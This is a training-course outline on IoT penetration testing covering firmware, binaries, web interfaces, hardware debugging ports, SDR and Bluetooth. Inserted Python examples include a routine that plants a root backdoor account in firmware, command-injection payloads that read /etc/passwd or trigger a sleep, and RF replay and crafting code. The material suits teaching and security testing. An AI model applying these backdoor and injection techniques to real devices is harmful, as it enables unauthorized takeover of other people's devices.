The Internet of Things covers physical devices, vehicles, weapons, home appliances and other items embedded with electronics, software and sensors, which have an IP address and network connectivity. This intensive, hands-on training plan covers the fundamentals of how IoT devices operate and communicate, and shows what lies behind their physical set-up. Students will explore different methodologies for detecting vulnerabilities in these devices and learn how to exploit them on the hardware, software and application layers. Participants will exercise those techniques and practice further with physical tools designed to help with the penetration process. The course also prepares attendees to master radio and Bluetooth exploitation methods, which are critical assets for IoT researchers. By completing the training, participants will have strong skills and practical experience in the domain of IoT exploitation, and will be familiar with some of the most advanced tools and techniques on the market.

The course targets participants with a solid foundation in computer networking and information security, who wish to understand the world of IoT security. Primarily:

  • Penetration testers
  • Software engineers
  • Security researchers
  • IoT or ICS specialists

Prerequisites:

  • Solid knowledge and experience in infrastructure security and network penetration testing
  • Familiarity with Linux
  • Basic assembly
  • Familiarity with web-app penetration testing – an advantage

100 Hours

Cyber Security


Certificate: No

Price: contact us for more details


Course Outline

Objectives

  • Understanding IoT architecture and its different components in depth.
  • Learning how to locate vulnerabilities and exploit IoT devices on three different layers: hardware, software and application.
  • Extracting vendor information from examined IoT devices and injecting data into others.
  • Working with advanced tools to accomplish demanding tasks of IoT vulnerability discovery and exploitation.
  • Working with radio and Bluetooth technologies, which are highly popular in the IoT world, to extract transmitted information and to intercept and control the traffic.

 

Hardware Requirements

The course requires the following hardware kit for each user or pair of users:

  • USB-TTL/FT232/BusPirate/Attify Badge
  • RTL-SDR
  • Arduino
  • A vulnerable device for hardware hacking
  • HackRF/Ubertooth

Note

The course includes a pre-prepared special virtual environment to serve as the IoT practice lab.

  


Module 1: Reconnaissance with Shodan – 4 hours

The first module introduces participants to Shodan, the most comprehensive search engine for the many types of computers and devices connected to the internet. Shodan offers multiple filters for locating the IPs of various IoT devices, such as servers, routers and webcams. Used well, it gives access to a huge amount of valuable information on the target. During this module, students will become familiar with the GUI and CLI uses of Shodan, learn how to use the right filters to narrow results down to the desired targets, and extract useful information for later exploitation.

  • Exploring Shodan
    • Graphic user interface
    • Command line interface
      • Using automation
      • Collecting data with advanced filtering
      • Extracting data
    • Mapping the internet
    • Mapping operating systems, applications and IoT devices to specific vulnerabilities

 

Module 2: Introduction to IoT – 8 hours

This module introduces the world of IoT from the bottom up, explaining to participants how IoT systems are constructed, their components in detail, and a full mapping from the infrastructure level up to the application level. Students will also set up the virtual lab that will serve them during the course when identifying vulnerabilities on the different IoT layers.

  • What is IoT
  • IoT file systems
  • IoT architectures
  • Tools used in IoT exploitation
  • Configuring the VM for IoT penetration testing
  • Introduction to embedded operating systems
  • Mapping the attack surface of an IoT device

 

Module 3: Firmware Analysis and Exploitation – 16 hours

The third module takes participants further into full-scale analysis of IoT devices, laying out the components of the system and locating vulnerabilities. At this stage, students will learn how to expose and extract vendor information embedded in the device and, conversely, inject their own credentials or other data into it. By the end of this stage, students will have acquired a substantial body of information and skills to prepare them for the more advanced stages in the following modules.

  • Mounting file systems
  • Firmware analysis
    • Using Binwalk
    • Identifying hardcoded vendor “secrets”
  • Emulating firmware binary
  • Backdooring a firmware
  • Running backdoored firmware
  • Firmware mod kit
  • Firmware analysis toolkit – using firmware emulation
  • Analyzing smart plugs
    • Reversing smart plug encryption
    • Exploiting smart plugs 
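
As an added illustration of the firmware-analysis and backdooring steps above (this is not course material or a tool from any vendor), the following Python scans an extracted root filesystem, such as Binwalk produces, for hardcoded vendor secrets and then plants a UID 0 account in etc/passwd. The root filesystem it scans is a constructed stand-in written to a temporary directory, and the placeholder password hash is an assumption; on a real image you would point `scan_rootfs` at the directory Binwalk extracted and generate the hash with `openssl passwd -1`.

```python
"""Scan an extracted firmware root filesystem for hardcoded vendor secrets,
then plant a backdoor account (the 'backdooring a firmware' step).
Added example; the rootfs is a constructed stand-in, not a real vendor image."""
import re
import tempfile
from pathlib import Path

# Constructed sample rootfs (invented contents, laid out like a typical busybox image).
SAMPLE_ROOTFS = {
    "etc/passwd": "root:$1$abcdef$XyZ123456789012345678:0:0:root:/root:/bin/sh\n"
                  "admin:x:0:0:admin:/:/bin/sh\n"
                  "nobody:*:99:99:nobody:/:/bin/false\n",
    "etc/shadow": "admin:$1$zyxwvu$ABCDEFGHIJKLMNOPQRSTU:0:0:99999:7:::\n",
    "etc/config/wifi.conf": "ssid=IoT-AP\npsk=Factory1234\n",
    "etc/ssl/server.key": "-----BEGIN RSA PRIVATE KEY-----\nAAAAAAAA\n-----END RSA PRIVATE KEY-----\n",
    "etc/init.d/rcS": "#!/bin/sh\ntelnetd -l /bin/sh &\nhttpd -p 80\n",
    "www/index.html": "<html><body>Smart Plug</body></html>\n",
}

SECRET_KV = re.compile(
    r"^\s*([A-Za-z0-9_.-]*(?:pass|pwd|psk|secret|token)[A-Za-z0-9_.-]*)\s*=\s*(\S+)",
    re.I | re.M)
PEM_KEY = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
TELNET_NOAUTH = re.compile(r"\btelnetd\b.*-l\s+/bin/sh")   # telnet shell with no login


def build_sample_rootfs(base: Path) -> Path:
    for rel, content in SAMPLE_ROOTFS.items():
        path = base / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)
    return base


def _read_text(path: Path, limit: int = 1 << 20):
    """Return file text, or None for binaries and oversized files."""
    try:
        if path.stat().st_size > limit:
            return None
        return path.read_text(encoding="utf-8")
    except (UnicodeDecodeError, OSError):
        return None


def check_passwd_like(rel: str, text: str):
    """Flag password hashes and extra UID 0 accounts in passwd/shadow."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 3:
            continue
        user, secret = fields[0], fields[1]
        if secret not in ("", "x", "*", "!", "!!"):
            findings.append((rel, f"password hash for '{user}': {secret}"))
        if rel.endswith("passwd") and fields[2] == "0" and user != "root":
            findings.append((rel, f"extra UID 0 account '{user}'"))
    return findings


def scan_rootfs(root: Path):
    """Walk the extracted filesystem and collect (path, description) findings."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = _read_text(path)
        if text is None:
            continue
        if rel.endswith(("etc/passwd", "etc/shadow")):
            findings += check_passwd_like(rel, text)
        if PEM_KEY.search(text):
            findings.append((rel, "embedded private key"))
        for m in SECRET_KV.finditer(text):
            findings.append((rel, f"hardcoded credential {m.group(1)}={m.group(2)}"))
        if TELNET_NOAUTH.search(text):
            findings.append((rel, "telnetd started with an unauthenticated shell"))
    return findings


def plant_backdoor(root: Path, user: str, password_hash: str) -> str:
    """Append a UID 0 account to etc/passwd.  password_hash is a crypt(3)
    string, e.g. the output of `openssl passwd -1 <password>` (placeholder here)."""
    line = f"{user}:{password_hash}:0:0:{user}:/:/bin/sh"
    with (root / "etc" / "passwd").open("a") as fh:
        fh.write(line + "\n")
    return line


def demo():
    """Scan the sample rootfs, backdoor it, scan again; returns both finding lists."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_rootfs(Path(tmp))
        before = scan_rootfs(root)
        plant_backdoor(root, "svc", "$1$hypothet$placeholder00000000000")  # placeholder hash
        after = scan_rootfs(root)
    return before, after


if __name__ == "__main__":
    for rel, what in demo()[1]:
        print(f"{rel}: {what}")
```

Running the scan a second time after planting the account is deliberate: the same checks that expose a vendor's leftover root hash also confirm that the backdoor you repacked into the image is actually present before you reflash it.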

Module 4: Software-Based Exploitation – 16 hours

During this module, participants will dive deeper into exploiting the software of MIPS- and ARM-based devices. They will explore advanced attack vectors stemming from the device's software itself, rather than from vendor-predefined settings. By the end of this stage, attendees will know how to debug and exploit memory-corruption vulnerabilities in binaries on both architectures.

  • Common software exploitation techniques
  • Introduction to MIPS
  • Binary debugging
  • ARM buffer overflow
  • Exploitation with GDB on MIPS
  • Exploit development on ARM

     

Module 5: Exploiting Web Application Vulnerabilities on IoT Devices – 16 hours

After covering the IoT vulnerability landscape on the hardware and software layers, students will examine the web-application side of IoT devices and look for further vulnerabilities on this platform, which can also be a door into the device and a way to take it over.

  • OWASP IoT Top 10
  • Exploitation with Burp Suite
  • Exploitation using command injection
  • Exploitation using blind command injection
  • Exploitation using brute force
  • Exploitation with CSRF
  • Extracting vendor credentials
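
An added example of the command-injection and blind-command-injection items above (not code from the course or from any device firmware): a diagnostics handler of the kind found behind an IoT web UI's ping form, first in the vulnerable string-building form and then hardened, plus the time-based probe a tester uses when the page never returns command output. The `binary` parameter is an assumption made so the demo runs without `ping`; pass `echo` to watch the injected command execute harmlessly.

```python
"""Command injection in an IoT 'diagnostics' ping handler, the hardened form,
and the time-based probe used to detect the blind variant.
Added example, not course material; `binary` is an assumption that lets the
demo run with `echo` instead of `ping`."""
import re
import subprocess
import time

# Allowlist: an IPv4 literal or a DNS name, and nothing else (no shell metacharacters).
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def vulnerable_ping(host: str, binary: str = "ping") -> str:
    """What many embedded web UIs do: splice the form field into a shell string."""
    cmd = f"{binary} -c 1 {host}"          # host='8.8.8.8; cat /etc/passwd' runs both
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout + result.stderr


def hardened_ping(host: str, binary: str = "ping") -> str:
    """Validate against an allowlist, then exec without a shell via an argv list."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    result = subprocess.run([binary, "-c", "1", host], capture_output=True, text=True)
    return result.stdout + result.stderr


def blind_probe(handler, delay: float = 1.0, binary: str = "ping") -> bool:
    """Blind command injection: when the page never echoes command output, a
    `sleep` payload still betrays execution through the response time."""
    payload = f"127.0.0.1; sleep {delay:g}"
    start = time.perf_counter()
    try:
        handler(payload, binary=binary)
    except ValueError:
        return False                       # input validation stopped it
    return time.perf_counter() - start >= delay


if __name__ == "__main__":
    attack = "127.0.0.1; echo INJECTED"
    print("vulnerable:", vulnerable_ping(attack, binary="echo"))
    print("blind probe on vulnerable handler:", blind_probe(vulnerable_ping, 1.0, "echo"))
    try:
        hardened_ping(attack, binary="echo")
    except ValueError as err:
        print("hardened:", err)
```

The fix has two independent parts, and both matter: the argv list removes the shell, so `;`, `|` and backticks reach the binary as literal text, and the allowlist stops values like `-f` that the binary itself would interpret as options.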

     

Module 6: Using Physical Tools for IoT Exploitation – 16 hours

During this module, students will practice with various physical tools designed for identifying vulnerabilities in, and exploiting, IoT devices in a variety of ways. Participants will work with these tools hands-on and attempt to penetrate a vulnerable IoT device.

  • Reconnaissance basics
  • Identifying serial interfaces
  • Identifying pinouts with a multimeter
  • Shell access on the target device
  • Getting root access and extracting information
  • UART
  • NAND attack
  • JTAG
    • Identifying JTAG pinouts
    • Using JTAGulator
    • Debugging with JTAG
  • USB-TTL
  • RTL-SDR
  • Arduino
    • Reading and writing EEPROMs
  • HackRF

     

Module 7: SDR (Software-Defined Radio) Based IoT Exploitation – 12 hours

Using tools that analyze radio signals, students will identify signals coming from different devices and work out their purpose. Participants will analyze the protocols a device uses and decode the signals it broadcasts. This module introduces participants to the world of radio hacking.

  • Introduction to SDR
  • Radio communication analysis
  • Attacking protocols
  • Decoding AM signals
  • RTL-SDR
    • Capturing FM signals
    • Analyzing wireless signals
  • Extracting text from signals
  • Attacking RF (radio frequency)
    • Introduction to RF
    • RF traffic analysis
    • RF replay attack
    • Crafting RF messages
    • Jamming RF signals
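
As an added example for the AM decoding, text-extraction and message-crafting items above (not the course's own material): a pure-Python on-off-keying (OOK) modulator and a demodulator built on a crude envelope detector, the kind of decode a tester does on a cheap remote or sensor. The "capture" is synthesized in-process instead of being recorded with an RTL-SDR, and the frame layout (0xAA preamble, length byte, ASCII payload) and the symbol timing are assumptions; a real capture would arrive as I/Q samples whose magnitude feeds `envelope()` in the same way.

```python
"""Recover text from an on-off-keyed (OOK) AM transmission with a crude
envelope detector.  Added example; the capture is synthesized in-process
(an RTL-SDR would deliver I/Q samples whose magnitude feeds envelope() the same
way), and the frame layout and symbol timing are assumptions."""
import math

SAMPLES_PER_BIT = 40      # assumed symbol period, e.g. 2.5 kbit/s at 100 kS/s
CARRIER_PERIOD = 10       # assumed: 4 carrier cycles per bit
PREAMBLE = 0xAA           # assumed frame: 0xAA, length byte, ASCII payload
THRESHOLD = 0.3           # envelope level separating 'carrier on' from 'off'


def _bits(byte: int):
    return [(byte >> i) & 1 for i in range(7, -1, -1)]   # MSB first


def modulate(text: str, silence: int = 100, spb: int = SAMPLES_PER_BIT):
    """Build the sample stream a transmitter (or a crafted/replayed message) produces."""
    frame = [PREAMBLE, len(text)] + list(text.encode("ascii"))
    samples = [0.0] * silence
    for byte in frame:
        for bit in _bits(byte):
            samples += [bit * math.cos(2 * math.pi * n / CARRIER_PERIOD) for n in range(spb)]
    return samples + [0.0] * silence


def envelope(samples, window: int = CARRIER_PERIOD):
    """Rectify and average over one carrier period: a software diode-and-capacitor."""
    out, buf, acc = [], [], 0.0
    for s in samples:
        mag = abs(s)
        buf.append(mag)
        acc += mag
        if len(buf) > window:
            acc -= buf.pop(0)
        out.append(acc / window)
    return out


def demodulate(samples, spb: int = SAMPLES_PER_BIT, threshold: float = THRESHOLD):
    """Find the carrier onset, sample mid-bit, check the preamble and decode ASCII."""
    env = envelope(samples)
    start = next((i for i, v in enumerate(env) if v > threshold), None)
    if start is None:
        return None                                 # nothing above the noise floor

    def bit_at(k: int) -> int:
        idx = start + k * spb + spb // 2
        return 1 if idx < len(env) and env[idx] > threshold else 0

    def byte_at(k: int) -> int:
        return int("".join(str(bit_at(8 * k + i)) for i in range(8)), 2)

    if byte_at(0) != PREAMBLE:
        return None                                 # not this protocol, or cut off
    length = byte_at(1)
    return bytes(byte_at(2 + i) for i in range(length)).decode("ascii", errors="replace")


if __name__ == "__main__":
    capture = modulate("OPEN")           # what a sniffed remote might send
    print(demodulate(capture))           # replaying 'capture' unchanged decodes the same
    print(demodulate(modulate("LOCK")))  # a crafted message in the same encoding
```

The replay attack in the outline is the degenerate case of this code: the sample list is retransmitted as-is and the receiver decodes it identically, which is why fixed-code OOK devices are a first target once the timing has been measured.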

     

Module 8: BLE (Bluetooth Low Energy) and Zigbee – 12 hours

Bluetooth is a highly widespread technology, used daily by many types of devices. During this module, participants will learn how to “eavesdrop” on Bluetooth communication and see what it transmits. This knowledge helps in planning the next steps of attacking Bluetooth using various advanced frameworks. The module also covers Zigbee, a widely used low-power wireless protocol that, like Bluetooth Low Energy, is extremely relevant to IoT devices and communication.

  • Introduction to Bluetooth
  • MiTM attacks
  • Bypassing authentication
  • Bluetooth cracking
  • Pairing modes
  • Sniffing with Ubertooth
  • Introduction to Zigbee
  • Zigbee exploitation
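
An added example of what eavesdropping on BLE yields before any pairing happens (not part of the course, and constructed here rather than captured with an Ubertooth): a parser for the AD structures in an advertising payload, which is where the device name, service UUIDs and manufacturer data leak in the clear. The sample packet bytes are constructed; company ID 0xFFFF is the value the Bluetooth SIG reserves for testing.

```python
"""Parse the advertising payload of a sniffed BLE packet into its AD structures.
Added example; SAMPLE_ADV is constructed, not captured, and company ID 0xFFFF is
the Bluetooth SIG value reserved for testing."""
import struct

AD_TYPE_NAMES = {
    0x01: "Flags", 0x02: "Incomplete 16-bit UUIDs", 0x03: "Complete 16-bit UUIDs",
    0x08: "Shortened Local Name", 0x09: "Complete Local Name", 0x0A: "TX Power Level",
    0x16: "Service Data (16-bit UUID)", 0xFF: "Manufacturer Specific Data",
}
FLAG_BITS = ["LE Limited Discoverable", "LE General Discoverable",
             "BR/EDR Not Supported", "Simultaneous LE+BR/EDR (Controller)",
             "Simultaneous LE+BR/EDR (Host)"]

# Constructed 27-byte AdvData: flags, name 'Plug-01', two 16-bit UUIDs, TX power, vendor data.
SAMPLE_ADV = bytes.fromhex(
    "02 01 06 "
    "08 09 50 6c 75 67 2d 30 31 "
    "05 03 0a 18 e0 ff "
    "02 0a 00 "
    "05 ff ff ff 01 02"
)


def parse_ad_structures(payload: bytes):
    """Split AdvData into (type, data) pairs; each structure is [len][type][data]."""
    out, i = [], 0
    while i < len(payload):
        length = payload[i]
        if length == 0:                      # zero-length structure = padding to 31 bytes
            break
        if i + 1 + length > len(payload):
            raise ValueError(f"truncated AD structure at offset {i}")
        out.append((payload[i + 1], bytes(payload[i + 2:i + 1 + length])))
        i += 1 + length
    return out


def decode_field(ad_type: int, data: bytes):
    """Render one AD structure's data according to its type."""
    if ad_type == 0x01:
        return [name for bit, name in enumerate(FLAG_BITS) if data and (data[0] >> bit) & 1]
    if ad_type in (0x08, 0x09):
        return data.decode("utf-8", errors="replace")
    if ad_type in (0x02, 0x03):
        count = len(data) // 2
        return [f"0x{u:04X}" for u in struct.unpack(f"<{count}H", data[:count * 2])]
    if ad_type == 0x0A:
        return struct.unpack("<b", data[:1])[0]           # dBm, signed
    if ad_type == 0xFF:
        (company,) = struct.unpack("<H", data[:2])        # little-endian company ID
        return {"company_id": f"0x{company:04X}", "data": data[2:].hex()}
    return data.hex()


def decode_advertisement(payload: bytes):
    """One entry per AD type; a real sniff may repeat a type across ADV and SCAN_RSP."""
    return {AD_TYPE_NAMES.get(t, f"0x{t:02X}"): decode_field(t, d)
            for t, d in parse_ad_structures(payload)}


if __name__ == "__main__":
    for name, value in decode_advertisement(SAMPLE_ADV).items():
        print(f"{name}: {value}")
```

Everything this prints is sent unencrypted in every advertising interval, so a passive sniffer already learns the device model, the services it exposes (here a vendor 0xFFE0 service alongside Device Information) and the vendor payload, which is what the MiTM and authentication-bypass steps in this module build on.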